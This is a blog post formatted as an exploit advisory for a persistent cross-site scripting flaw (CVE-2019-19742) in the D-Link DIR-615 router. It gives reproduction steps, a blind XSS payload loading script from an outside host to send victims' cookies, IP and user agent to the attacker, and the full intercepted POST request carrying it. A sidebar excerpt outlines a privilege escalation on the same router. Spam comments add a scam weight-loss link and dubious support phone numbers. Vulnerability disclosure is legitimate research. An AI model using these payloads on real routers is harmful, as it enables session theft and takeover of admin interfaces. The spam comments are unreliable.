D-Link DIR-615 Wireless Router  -  Persistent Cross-Site Scripting

-
######################################################################################
# Exploit Title: D-Link DIR-615 Wireless Router — Persistent Cross Site Scripting
# Date: 13.12.2019
# Exploit Author: Sanyam Chawla
# Vendor Homepage: http://www.dlink.co.in
# Category: Hardware (Wi-fi Router)
# Hardware Link: http://www.dlink.co.in/products/?pid=678
# Hardware Version: T1
# Firmware Version: 20.07
# Tested on: Windows 10 and Kali linux
# CVE: CVE-2019–19742
#######################################################################################
Reproduction Steps:
 — — — — — — — — — — — — — — — 
  1. Login to your wi-fi router gateway with admin credentials [i.e: http://192.168.0.1]
  2. Go to Maintenance page and click on Admin on the left pannel.
  3. Put blind XSS Payload in to the name field — “><script src=https://ptguy.xss.ht></script>. This payload saved by the server and its reflected in the user page.
  4. Every refresh in the user home page, the XSS payload executes and sends data (IP, cookies, victim user agent) to the attacker.
  5. For HTML injection just put <b> Testing </b> in username field, you will get the username bold in your homepage.
    ####################################################################################### 
#Burp Intercept

POST /form2userconfig.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0)
Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 180
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/userconfig.htm
Cookie: SessionID=
Upgrade-Insecure-Requests: 1

username=*%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fptguy.xss.ht
<http://2Fptguy.xss.ht>%3E%3C%2Fscript%3E*&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send

Comments

  1. Sofiya30 December 2019 at 22:28


    It is wonderful, looking at the time and effort you put into your weblog and detailed information you provide.
    MDX Concepts Gypsum Spray for Bed Bugs
    I'll bookmark your weblog and visit it weekly for your new posts.

    ReplyDelete
  2. gopipatel24 January 2020 at 20:52

    Wow! amazing post.. Thanks for sharing!
    Best WiFi Extenders to Look For In the Year 2020

    ReplyDelete
  3. Unknown24 February 2020 at 04:54

    As reported by Stanford Medical, It's indeed the ONLY reason women in this country live 10 years more and weigh on average 19 KG less than we do.

    (And by the way, it has totally NOTHING to do with genetics or some secret diet and absolutely EVERYTHING to about "how" they are eating.)

    BTW, What I said is "HOW", and not "WHAT"...

    Tap on this link to uncover if this quick questionnaire can help you release your true weight loss possibility

    ReplyDelete
  4. Daisy Jones5 March 2020 at 23:38

    Looking for dlink firmware call on 1800987893 , visit on: dlink firmware
    Looking for dlink admin password call on 1800987893 , visit on: dlink admin password

    ReplyDelete

Post a Comment

Popular posts from this blog

D-Link DIR-615 Wireless Router —Vertical Privilege Escalation - CVE-2019–19743

-
Image
###################################################################################### # Exploit Title: D-Link DIR-615 — Vertical Prviliege Escalation # Date: 10.12.2019 # Exploit Author: Sanyam Chawla # Vendor Homepage: http://www.dlink.co.in # Category: Hardware (Wi-fi Router) # Hardware Link: http://www.dlink.co.in/products/?pid=678 # Hardware Version: T1 # Firmware Version: 20.07 # Tested on: Windows 10 and Kali linux # CVE: CVE-2019–19743 ####################################################################################### Reproduction Steps: Login to your wi-fi router gateway with normal user credentials [i.e: http://192.168.0.1 ] Go to the Maintenance page and click on Admin on the left panel. There is an option to create a user and by default, it shows only user accounts. Create an account with a name(i.e ptguy) and change the privileges from user to root(admin) by changing privileges id with burp suite. Privilege Escalation Post Request
Read more

OWASP Top 10 2017 — Web Application Security Risks

-
Image
What is OWASP :  The Open Web Application Security Project ( OWASP ) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. OWASP is an organization filled with security experts from around the world who provide information about applications and the risks posed, in the most direct, neutral, and practical way. Since 2003, OWASP has been releasing the OWASP Top 10 list every three/four years. The list consists of the top biggest Web Application Security Risks according to OWASP. The list is compiled with the latest vulnerabilities, threats and attacks, as well as detection tactics and remediation. OWASP Top 10 project members create the list by analyzing the occurrence rates and the general severity of each threat facing our rapidly evolving application world. Image Source google A-1) SQL INJECTION : W HAT IS IT? Websites and apps occasionally need to run commands on the underlying database or operati
Read more